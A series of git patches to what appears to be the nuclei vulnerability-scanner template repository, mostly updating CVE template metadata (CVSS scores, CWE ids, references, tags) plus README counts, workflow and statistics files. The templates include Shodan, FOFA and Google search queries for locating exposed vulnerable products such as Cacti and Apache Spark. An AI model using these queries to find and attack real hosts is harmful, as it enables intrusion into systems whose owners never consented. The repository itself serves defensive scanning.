rce,unauth,wpscan,cve,cve2022,wp,vr-calendar-sync,wordpress,wp-plugin requests: - raw: diff --git a/cves/2022/CVE-2022-23854.yaml b/cves/2022/CVE-2022-23854.yaml index dd1f30bd82..a959cdbceb 100644 --- a/cves/2022/CVE-2022-23854.yaml +++ b/cves/2022/CVE-2022-23854.yaml @@ -12,7 +12,10 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23854 - https://www.cisa.gov/uscert/ics/advisories/icsa-22-342-02 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2022-23854 + cwe-id: CWE-23 metadata: shodan-query: http.html:"InTouch Access Anywhere" verified: "true" diff --git a/cves/2022/CVE-2022-24816.yaml b/cves/2022/CVE-2022-24816.yaml index 800b7fc91d..11d8a8b33a 100644 --- a/cves/2022/CVE-2022-24816.yaml +++ b/cves/2022/CVE-2022-24816.yaml @@ -9,12 +9,17 @@ info: reference: - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html - https://nvd.nist.gov/vuln/detail/CVE-2022-24816 + - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx + - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-24816 + cwe-id: CWE-94 metadata: - verified: true - shodan-query: /geoserver/ fofa-query: app="GeoServer" + shodan-query: /geoserver/ + verified: "true" tags: cve,cve2022,geoserver,rce requests: diff --git a/cves/2022/CVE-2022-33891.yaml b/cves/2022/CVE-2022-33891.yaml index ffb2b048f2..709c340a2a 100644 --- a/cves/2022/CVE-2022-33891.yaml +++ b/cves/2022/CVE-2022-33891.yaml @@ -8,9 +8,16 @@ info: reference: - https://github.com/W01fh4cker/cve-2022-33891 - https://nvd.nist.gov/vuln/detail/CVE-2022-33891 + - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc + - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-33891 + cwe-id: CWE-77 metadata: - verified: "true" shodan-query: title:"Spark Master at" + verified: "true" tags: cve,cve2022,apache,spark,authenticated variables: diff --git a/cves/2022/CVE-2022-3768.yaml b/cves/2022/CVE-2022-3768.yaml index 6a15ca0e43..fb47cd3c5f 100644 --- a/cves/2022/CVE-2022-3768.yaml +++ b/cves/2022/CVE-2022-3768.yaml @@ -6,12 +6,12 @@ info: severity: high description: | The WPSmartContracts WordPress plugin before 1.3.12 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as author - remediation: Fixed in version 1.3.12 reference: - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768 - https://nvd.nist.gov/vuln/detail/CVE-2022-3768 - https://cve.report/CVE-2022-3768 + remediation: Fixed in version 1.3.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 @@ -19,7 +19,7 @@ info: cwe-id: CWE-89 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,wp-smart-contracts,authenticated + tags: wp-smart-contracts,authenticated,cve,wordpress,wp,sqli,cve2022,wp-plugin,wpscan requests: - raw: diff --git a/cves/2022/CVE-2022-4050.yaml b/cves/2022/CVE-2022-4050.yaml index 12ac0b3770..8e50ec6870 100644 --- a/cves/2022/CVE-2022-4050.yaml +++ b/cves/2022/CVE-2022-4050.yaml @@ -11,10 +11,13 @@ info: - https://wordpress.org/plugins/joomsport-sports-league-results-management/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4050 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2022-4050 + cwe-id: CWE-89 metadata: - verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,joomsport-sports-league-results-management,unauth + verified: "true" + tags: wpscan,cve,cve2022,wp-plugin,wp,joomsport-sports-league-results-management,wordpress,sqli,unauth requests: - raw: diff --git a/cves/2022/CVE-2022-4260.yaml b/cves/2022/CVE-2022-4260.yaml index 878c3af317..b861d59842 100644 --- a/cves/2022/CVE-2022-4260.yaml +++ b/cves/2022/CVE-2022-4260.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-79 metadata: verified: "true" - tags: cve,cve2022,wordpress,wp-plugin,wp,xss,wp-ban,authenticated + tags: wp-plugin,xss,wp-ban,authenticated,wpscan,cve,cve2022,wordpress,wp requests: - raw: diff --git a/cves/2022/CVE-2022-42746.yaml b/cves/2022/CVE-2022-42746.yaml index adadc0de09..6ff93c907c 100644 --- a/cves/2022/CVE-2022-42746.yaml +++ b/cves/2022/CVE-2022-42746.yaml @@ -9,14 +9,15 @@ info: reference: - https://fluidattacks.com/advisories/modestep/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42746 + - https://candidats.net/ classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-42746 - cwe-id: CWE-80 + cwe-id: CWE-79 metadata: - verified: true shodan-query: http.html:"CandidATS" + verified: "true" tags: cve,cve2022,candidats,xss requests: diff --git a/cves/2022/CVE-2022-45917.yaml b/cves/2022/CVE-2022-45917.yaml index 91179758e9..07b78e4a41 100644 --- a/cves/2022/CVE-2022-45917.yaml +++ b/cves/2022/CVE-2022-45917.yaml @@ -11,10 +11,15 @@ info: - https://seclists.org/fulldisclosure/2022/Dec/7 - https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-ilias-elearning-platform/ - https://github.com/advisories/GHSA-hf6q-rx44-fh6j + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-45917 + cwe-id: CWE-601 metadata: - verified: true shodan-query: http.html:"ILIAS" - tags: cve,cve2022,ilias,redirect + verified: "true" + tags: redirect,packetstorm,seclists,cve,cve2022,ilias requests: - method: GET diff --git a/cves/2022/CVE-2022-46169.yaml b/cves/2022/CVE-2022-46169.yaml index 12f5d450d5..9138c55c53 100644 --- a/cves/2022/CVE-2022-46169.yaml +++ b/cves/2022/CVE-2022-46169.yaml @@ -5,7 +5,7 @@ info: author: Hardik-Solanki severity: critical description: | - The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. + The vulnerability allows a remote attacker to compromise the affected system. The vulnerability exists due to insufficient authorization within the Remote Agent when handling HTTP requests with a custom Forwarded-For HTTP header. A remote non-authenticated attacker can send a specially crafted HTTP request to the affected instance and execute arbitrary OS commands on the server. reference: - https://security-tracker.debian.org/tracker/CVE-2022-46169 - https://nvd.nist.gov/vuln/detail/CVE-2022-46169 @@ -17,8 +17,8 @@ info: cve-id: CVE-2022-46169 cwe-id: CWE-285 metadata: - verified: "true" shodan-query: title:"Login to Cacti" + verified: "true" tags: cve2022,cve,auth-bypass,cacti requests: diff --git a/cves/2022/CVE-2022-46381.yaml b/cves/2022/CVE-2022-46381.yaml index 7f4b1bfb6c..49e6e876c8 100644 --- a/cves/2022/CVE-2022-46381.yaml +++ b/cves/2022/CVE-2022-46381.yaml @@ -9,9 +9,14 @@ info: reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46381 - https://github.com/omarhashem123/Security-Research/blob/main/CVE-2022-46381/CVE-2022-46381.txt + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2022-46381 + cwe-id: CWE-79 metadata: - verified: "true" shodan-query: http.html:"Linear eMerge" + verified: "true" tags: cve,cve2022,xss,emerge,linear requests: diff --git a/exposures/files/svn-wc-db.yaml b/exposures/files/svn-wc-db.yaml index eda792a694..8b83ed7c27 100644 --- a/exposures/files/svn-wc-db.yaml +++ b/exposures/files/svn-wc-db.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true google-query: intitle:"index of" "wc.db" - tags: exposure,svn,config,files + tags: msf,exposure,svn,config,files requests: - method: GET diff --git a/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml b/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml index 43a046ecd2..3c67c2fc6f 100644 --- a/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml +++ b/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml @@ -21,7 +21,7 @@ info: verified: true shodan-query: title:"VMware Appliance Management" fofa-query: title="VMware Appliance Management" - tags: vmware,xstream,rce + tags: vmware,xstream,rce,msf variables: lowerrstr: "{{to_lower(rand_text_alpha(6))}}" diff --git a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml index 99331b2d7a..ff4d27be3a 100644 --- a/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml +++ b/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml @@ -13,7 +13,7 @@ info: metadata: verified: "true" shodan-query: http.html:"VMG1312-B10D" - tags: misconfig,unauth,zyxel,lfi + tags: misconfig,unauth,zyxel,lfi,msf requests: - raw: From 0c80391c30d53580226b0ebecd984084fcf0309a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 11:22:50 +0000 Subject: [PATCH 0740/1133] Auto README Update [Thu Jan 5 11:22:50 UTC 2023] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index aa52baade0..6088949525 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | | tech | 360 | princechaddha | 153 | file | 78 | | | | | -**335 directories, 5238 files**. +**335 directories, 5242 files**. From 15bea7a64655b8893fd94bc2fb648e4cdf7606ae Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 5 Jan 2023 16:58:11 +0530 Subject: [PATCH 0741/1133] Update templates-stats.yml --- .github/workflows/templates-stats.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index e393fa68d3..4334958366 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -10,7 +10,9 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@master + - uses: actions/checkout@v3 + with: + fetch-depth: 0 - uses: actions/setup-go@v2 with: go-version: 1.18 From 10581dd12b83156ac65864941bc9da1575d51fe0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 5 Jan 2023 17:00:21 +0530 Subject: [PATCH 0743/1133] Update lenovo-fp-panel.yaml --- exposed-panels/lenovo-fp-panel.yaml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/exposed-panels/lenovo-fp-panel.yaml b/exposed-panels/lenovo-fp-panel.yaml index ec71c56f05..39fcf0f5c1 100644 --- a/exposed-panels/lenovo-fp-panel.yaml +++ b/exposed-panels/lenovo-fp-panel.yaml @@ -4,12 +4,6 @@ info: name: Lenovo Fan and Power Controller Panel author: megamansec severity: info - description: | - Lenovo Fan and Power controller was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 metadata: verified: true shodan-query: http.html:"Avocent Corporation and its affiliates" @@ -19,7 +13,9 @@ requests: - method: GET path: - "{{BaseURL}}" + - "{{BaseURL}}/login.html" + stop-at-first-match: true host-redirects: true max-redirects: 2 matchers-condition: and From 2231f9d02fc2071349f171c10dbeaf8169cf87d4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 11:34:02 +0000 Subject: [PATCH 0744/1133] Auto Generated New Template Addition List [Thu Jan 5 11:34:02 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4956d97b0c..11415fbe49 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ cves/2021/CVE-2021-24946.yaml cves/2022/CVE-2022-0784.yaml cves/2022/CVE-2022-24816.yaml cves/2022/CVE-2022-46169.yaml +exposed-panels/lenovo-fp-panel.yaml exposed-panels/mpftvc-admin-panel.yaml exposed-panels/netsparker-panel.yaml exposed-panels/watershed-panel.yaml From 35af13dbb2a2101859729b4ceb5b6f62fbae2a13 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 11:44:19 +0000 Subject: [PATCH 0745/1133] Auto README Update [Thu Jan 5 11:44:19 UTC 2023] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 6088949525..85d05b827e 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | | | tech | 360 | princechaddha | 153 | file | 78 | | | | | -**335 directories, 5242 files**. +**335 directories, 5243 files**. From 32f3e9698ef6d878e50aba906e7e144b98ccb796 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 5 Jan 2023 17:17:22 +0530 Subject: [PATCH 0746/1133] misc fix --- .github/workflows/templates-stats.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index 4334958366..2b4978d3c0 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -53,5 +53,4 @@ jobs: - name: Push changes uses: ad-m/github-push-action@master with: - github_token: ${{ secrets.GITHUB_TOKEN }} - branch: master \ No newline at end of file + github_token: ${{ secrets.GITHUB_TOKEN }} \ No newline at end of file From ca3bef4b759b14801b60f82eaa6e45cf14b40b56 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 5 Jan 2023 11:48:14 +0000 Subject: [PATCH 0748/1133] Auto Generated Templates Stats [Thu Jan 5 11:48:14 UTC 2023] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 4635 +++++++++++++++++++++--------------------- TOP-10.md | 24 +- 3 files changed, 2366 insertions(+), 2295 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index bdf8e733a6..0495f32706 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":1552},{"name":"panel","count":780},{"name":"edb","count":582},{"name":"exposure","count":551},{"name":"xss","count":543},{"name":"lfi","count":519},{"name":"wordpress","count":471},{"name":"cve2021","count":370},{"name":"wp-plugin","count":366},{"name":"tech","count":360},{"name":"rce","count":347},{"name":"packetstorm","count":292},{"name":"cve2022","count":266},{"name":"wpscan","count":256},{"name":"token-spray","count":236},{"name":"misconfig","count":228},{"name":"cve2020","count":224},{"name":"","count":195},{"name":"unauth","count":194},{"name":"wp","count":188},{"name":"kev","count":168},{"name":"config","count":167},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":133},{"name":"apache","count":127},{"name":"oast","count":127},{"name":"iot","count":125},{"name":"authenticated","count":121},{"name":"sqli","count":118},{"name":"cve2010","count":111},{"name":"files","count":92},{"name":"router","count":92},{"name":"redirect","count":90},{"name":"login","count":89},{"name":"network","count":81},{"name":"takeover","count":75},{"name":"devops","count":75},{"name":"token","count":74},{"name":"ssrf","count":72},{"name":"cve2017","count":71},{"name":"cms","count":67},{"name":"auth-bypass","count":66},{"name":"file","count":65},{"name":"oracle","count":63},{"name":"intrusive","count":60},{"name":"install","count":59},{"name":"disclosure","count":57},{"name":"seclists","count":57},{"name":"oss","count":52},{"name":"cisco","count":50},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"cve2015","count":47},{"name":"fileupload","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"plugin","count":41},{"name":"cve2014","count":41},{"name":"hackerone","count":39},{"name":"vmware","count":38},{"name":"vulhub","count":38},{"name":"logs","count":38},{"name":"atlassian","count":38},{"name":"debug","count":37},{"name":"tenable","count":36},{"name":"springboot","count":35},{"name":"traversal","count":35},{"name":"injection","count":34},{"name":"jira","count":32},{"name":"huntr","count":31},{"name":"listing","count":31},{"name":"kubernetes","count":30},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"log4j","count":26},{"name":"cnvd","count":25},{"name":"sap","count":25},{"name":"microsoft","count":25},{"name":"misc","count":23},{"name":"jndi","count":23},{"name":"proxy","count":23},{"name":"aws","count":23},{"name":"fuzz","count":22},{"name":"php","count":22},{"name":"api","count":21},{"name":"zoho","count":21},{"name":"manageengine","count":21},{"name":"cve2012","count":21},{"name":"wp-theme","count":21},{"name":"cloud","count":20},{"name":"weblogic","count":20},{"name":"tomcat","count":19},{"name":"k8s","count":19},{"name":"camera","count":19},{"name":"ibm","count":19},{"name":"cicd","count":19},{"name":"deserialization","count":19},{"name":"gitlab","count":18},{"name":"dlink","count":18},{"name":"firewall","count":17},{"name":"service","count":17},{"name":"jenkins","count":17},{"name":"wavlink","count":17},{"name":"struts","count":17},{"name":"ftp","count":16},{"name":"printer","count":16},{"name":"nginx","count":15},{"name":"xxe","count":15},{"name":"cve2011","count":15},{"name":"cve2009","count":15},{"name":"fortinet","count":15},{"name":"java","count":14},{"name":"domainmod","count":14},{"name":"hp","count":14},{"name":"android","count":14},{"name":"confluence","count":13},{"name":"woocommerce","count":13},{"name":"cve2008","count":13},{"name":"status","count":13},{"name":"msf","count":13},{"name":"amazon","count":13},{"name":"abstractapi","count":13},{"name":"cve2013","count":13},{"name":"lfr","count":13},{"name":"magento","count":13},{"name":"drupal","count":12},{"name":"microweber","count":12},{"name":"github","count":12},{"name":"netgear","count":12},{"name":"rails","count":12},{"name":"fortigate","count":12},{"name":"vpn","count":12},{"name":"backup","count":12},{"name":"ruijie","count":12},{"name":"netsweeper","count":12},{"name":"graphql","count":12},{"name":"webserver","count":11},{"name":"zyxel","count":11},{"name":"azure","count":11},{"name":"ssl","count":11},{"name":"cnvd2021","count":11},{"name":"backdoor","count":11},{"name":"mail","count":11},{"name":"cisa","count":11},{"name":"airflow","count":11},{"name":"laravel","count":10},{"name":"django","count":10},{"name":"git","count":10},{"name":"dell","count":10},{"name":"grafana","count":10},{"name":"glpi","count":10},{"name":"ruby","count":10},{"name":"jolokia","count":10},{"name":"spring","count":10},{"name":"coldfusion","count":10},{"name":"ssti","count":9},{"name":"fastjson","count":9},{"name":"kube","count":9},{"name":"phpmyadmin","count":9},{"name":"prometheus","count":9},{"name":"windows","count":9},{"name":"ssh","count":9},{"name":"zimbra","count":9},{"name":"versa","count":9},{"name":"vcenter","count":9},{"name":"sonicwall","count":9},{"name":"dedecms","count":9},{"name":"iis","count":9},{"name":"zabbix","count":9},{"name":"wso2","count":9},{"name":"symfony","count":8},{"name":"audit","count":8},{"name":"npm","count":8},{"name":"config-audit","count":8},{"name":"solarview","count":8},{"name":"jetbrains","count":8},{"name":"elasticsearch","count":8},{"name":"bucket","count":8},{"name":"recon","count":8},{"name":"kafka","count":8},{"name":"auth","count":8},{"name":"scada","count":8},{"name":"citrix","count":8},{"name":"metadata","count":8},{"name":"cisco-switch","count":8},{"name":"jboss","count":8},{"name":"headless","count":8},{"name":"mirai","count":8},{"name":"solr","count":8},{"name":"hms","count":8},{"name":"maps","count":7},{"name":"go","count":7},{"name":"firebase","count":7},{"name":"blind","count":7},{"name":"opencats","count":7},{"name":"ognl","count":7},{"name":"samsung","count":7},{"name":"seeyon","count":7},{"name":"detect","count":7},{"name":"nodejs","count":7},{"name":"python","count":7},{"name":"cnvd2020","count":7},{"name":"docker","count":7},{"name":"squirrelmail","count":7},{"name":"icewarp","count":7},{"name":"druid","count":7},{"name":"exchange","count":7},{"name":"microstrategy","count":6},{"name":"huawei","count":6},{"name":"cobbler","count":6},{"name":"websphere","count":6},{"name":"slack","count":6},{"name":"fpd","count":6},{"name":"liferay","count":6},{"name":"emerge","count":6},{"name":"vms","count":6},{"name":"admin","count":6},{"name":"setup","count":6},{"name":"enum","count":6},{"name":"smtp","count":6},{"name":"moodle","count":6},{"name":"kubelet","count":6},{"name":"jamf","count":6},{"name":"cache","count":6},{"name":"ofbiz","count":6},{"name":"crlf","count":6},{"name":"jetty","count":6},{"name":"activemq","count":6},{"name":"artica","count":6},{"name":"elfinder","count":6},{"name":"thinkphp","count":6},{"name":"node","count":6},{"name":"zhiyuan","count":6},{"name":"lucee","count":6},{"name":"opensis","count":6},{"name":"rconfig","count":6},{"name":"magmi","count":6},{"name":"openvpn","count":6},{"name":"bigip","count":6},{"name":"ecology","count":6},{"name":"sitecore","count":6},{"name":"bypass","count":6},{"name":"db","count":6},{"name":"elastic","count":5},{"name":"minio","count":5},{"name":"filemanager","count":5},{"name":"gogs","count":5},{"name":"keycloak","count":5},{"name":"gocd","count":5},{"name":"parallels","count":5},{"name":"nagios","count":5},{"name":"mongodb","count":5},{"name":"74cms","count":5},{"name":"firmware","count":5},{"name":"error","count":5},{"name":"solarwinds","count":5},{"name":"alibaba","count":5},{"name":"rseenet","count":5},{"name":"fortios","count":5},{"name":"apisix","count":5},{"name":"s3","count":5},{"name":"symantec","count":5},{"name":"carrental","count":5},{"name":"prestashop","count":5},{"name":"redis","count":5},{"name":"avideo","count":5},{"name":"scan","count":5},{"name":"plesk","count":5},{"name":"leak","count":5},{"name":"fatpipe","count":5},{"name":"metinfo","count":5},{"name":"circarlife","count":5},{"name":"rfi","count":5},{"name":"cockpit","count":5},{"name":"storage","count":5},{"name":"strapi","count":5},{"name":"database","count":5},{"name":"vbulletin","count":5},{"name":"awstats","count":5},{"name":"openemr","count":4},{"name":"sangfor","count":4},{"name":"redmine","count":4},{"name":"artifactory","count":4},{"name":"terramaster","count":4},{"name":"candidats","count":4},{"name":"httpserver","count":4},{"name":"hashicorp","count":4},{"name":"console","count":4},{"name":"zte","count":4},{"name":"search","count":4},{"name":"telerik","count":4},{"name":"hpe","count":4},{"name":"phppgadmin","count":4},{"name":"hoteldruid","count":4},{"name":"beyondtrust","count":4},{"name":"sendgrid","count":4},{"name":"wcs","count":4},{"name":"puppet","count":4},{"name":"cve2007","count":4},{"name":"tikiwiki","count":4},{"name":"ampache","count":4},{"name":"kentico","count":4},{"name":"cnvd2019","count":4},{"name":"vrealize","count":4},{"name":"springcloud","count":4},{"name":"prtg","count":4},{"name":"nexus","count":4},{"name":"roxy","count":4},{"name":"stripe","count":4},{"name":"asp","count":4},{"name":"royalevent","count":4},{"name":"aspose","count":4},{"name":"sophos","count":4},{"name":"flink","count":4},{"name":"jellyfin","count":4},{"name":"cacti","count":4},{"name":"kevinlab","count":4},{"name":"bmc","count":4},{"name":"gnuboard","count":4},{"name":"linkerd","count":4},{"name":"telesquare","count":4},{"name":"panos","count":4},{"name":"voip","count":4},{"name":"oauth","count":4},{"name":"kibana","count":4},{"name":"tenda","count":4},{"name":"couchdb","count":4},{"name":"hongdian","count":4},{"name":"thinkcmf","count":4},{"name":"ems","count":4},{"name":"hybris","count":4},{"name":"xmlrpc","count":4},{"name":"mailchimp","count":4},{"name":"gitea","count":4},{"name":"rabbitmq","count":4},{"name":"dropbear","count":4},{"name":"oa","count":4},{"name":"axigen","count":4},{"name":"horde","count":4},{"name":"paypal","count":4},{"name":"nosqli","count":4},{"name":"caucho","count":4},{"name":"sonarqube","count":4},{"name":"yeswiki","count":4},{"name":"postmessage","count":4},{"name":"phpinfo","count":4},{"name":"adminer","count":4},{"name":"hikvision","count":4},{"name":"resin","count":4},{"name":"photo","count":4},{"name":"ruckus","count":4},{"name":"umbraco","count":4},{"name":"sql","count":4},{"name":"typo3","count":4},{"name":"jeesns","count":3},{"name":"goanywhere","count":3},{"name":"splunk","count":3},{"name":"bitbucket","count":3},{"name":"fileman","count":3},{"name":"fuelcms","count":3},{"name":"kingsoft","count":3},{"name":"graylog","count":3},{"name":"ampps","count":3},{"name":"httpd","count":3},{"name":"movable","count":3},{"name":"eshop","count":3},{"name":"bigant","count":3},{"name":"pfsense","count":3},{"name":"subrion","count":3},{"name":"thruk","count":3},{"name":"axis","count":3},{"name":"codeigniter","count":3},{"name":"netlify","count":3},{"name":"flexvnf","count":3},{"name":"openstack","count":3},{"name":"wordfence","count":3},{"name":"redash","count":3},{"name":"axis2","count":3},{"name":"webadmin","count":3},{"name":"microfocus","count":3},{"name":"blockchain","count":3},{"name":"influxdb","count":3},{"name":"kkfileview","count":3},{"name":"panabit","count":3},{"name":"rlm","count":3},{"name":"drawio","count":3},{"name":"grav","count":3},{"name":"pip","count":3},{"name":"steve","count":3},{"name":"finecms","count":3},{"name":"sentry","count":3},{"name":"square","count":3},{"name":"superadmin","count":3},{"name":"mikrotik","count":3},{"name":"intercom","count":3},{"name":"pentaho","count":3},{"name":"mautic","count":3},{"name":"jfrog","count":3},{"name":"webmin","count":3},{"name":"smb","count":3},{"name":"consul","count":3},{"name":"ec2","count":3},{"name":"teamcity","count":3},{"name":"clusterengine","count":3},{"name":"rackn","count":3},{"name":"webmail","count":3},{"name":"openam","count":3},{"name":"sharepoint","count":3},{"name":"bitrix","count":3},{"name":"3cx","count":3},{"name":"globalprotect","count":3},{"name":"dreambox","count":3},{"name":"digitalocean","count":3},{"name":"yonyou","count":3},{"name":"odoo","count":3},{"name":"elementor","count":3},{"name":"epson","count":3},{"name":"linksys","count":3},{"name":"labkey","count":3},{"name":"digitalrebar","count":3},{"name":"dotcms","count":3},{"name":"seagate","count":3},{"name":"pega","count":3},{"name":"dom","count":3},{"name":"selenium","count":3},{"name":"netdata","count":3},{"name":"samba","count":3},{"name":"weiphp","count":3},{"name":"mongo","count":3},{"name":"metabase","count":3},{"name":"cloudflare","count":3},{"name":"concrete","count":3},{"name":"selea","count":3},{"name":"zend","count":3},{"name":"thinfinity","count":3},{"name":"aptus","count":3},{"name":"lansweeper","count":3},{"name":"telnet","count":3},{"name":"centos","count":3},{"name":"lotus","count":3},{"name":"unifi","count":3},{"name":"trendnet","count":3},{"name":"getsimple","count":3},{"name":"httpbin","count":3},{"name":"mcafee","count":3},{"name":"openfire","count":3},{"name":"cve2005","count":3},{"name":"ivanti","count":3},{"name":"zeroshell","count":3},{"name":"r-seenet","count":3},{"name":"jupyter","count":3},{"name":"targa","count":3},{"name":"ansible","count":3},{"name":"proftpd","count":3},{"name":"geoserver","count":3},{"name":"bruteforce","count":3},{"name":"matrix","count":3},{"name":"fanruan","count":3},{"name":"mantisbt","count":3},{"name":"sugarcrm","count":3},{"name":"key","count":3},{"name":"express","count":3},{"name":"octobercms","count":3},{"name":"geowebserver","count":3},{"name":"dzzoffice","count":3},{"name":"voipmonitor","count":3},{"name":"trixbox","count":3},{"name":"hsphere","count":3},{"name":"glassfish","count":3},{"name":"modem","count":3},{"name":"mobileiron","count":3},{"name":"synology","count":3},{"name":"nortek","count":3},{"name":"tableau","count":3},{"name":"openbmcs","count":3},{"name":"messaging","count":3},{"name":"sftp","count":3},{"name":"dolibarr","count":3},{"name":"ebs","count":3},{"name":"atom","count":3},{"name":"avtech","count":3},{"name":"empirecms","count":3},{"name":"nacos","count":3},{"name":"rocketchat","count":3},{"name":"kfm","count":3},{"name":"actuator","count":3},{"name":"log","count":3},{"name":"qnap","count":3},{"name":"servicenow","count":3},{"name":"nuuo","count":3},{"name":"harbor","count":3},{"name":"payara","count":3},{"name":"processwire","count":3},{"name":"heroku","count":3},{"name":"graph","count":3},{"name":"buffalo","count":3},{"name":"circleci","count":3},{"name":"facebook","count":3},{"name":"osticket","count":2},{"name":"konga","count":2},{"name":"wwbn","count":2},{"name":"places","count":2},{"name":"kkFileView","count":2},{"name":"linux","count":2},{"name":"cgi","count":2},{"name":"rstudio","count":2},{"name":"dotnetnuke","count":2},{"name":"eko","count":2},{"name":"watchguard","count":2},{"name":"circontrol","count":2},{"name":"default-page","count":2},{"name":"aqua","count":2},{"name":"globaldomains","count":2},{"name":"espeasy","count":2},{"name":"hiveos","count":2},{"name":"ucmdb","count":2},{"name":"reolink","count":2},{"name":"ecoa","count":2},{"name":"zblogphp","count":2},{"name":"supermicro","count":2},{"name":"bash","count":2},{"name":"opencpu","count":2},{"name":"viewpoint","count":2},{"name":"erxes","count":2},{"name":"xnat","count":2},{"name":"acrolinx","count":2},{"name":"gcp","count":2},{"name":"phpcollab","count":2},{"name":"homematic","count":2},{"name":"xoops","count":2},{"name":"zzzcms","count":2},{"name":"imap","count":2},{"name":"hadoop","count":2},{"name":"frontpage","count":2},{"name":"qihang","count":2},{"name":"igs","count":2},{"name":"nasos","count":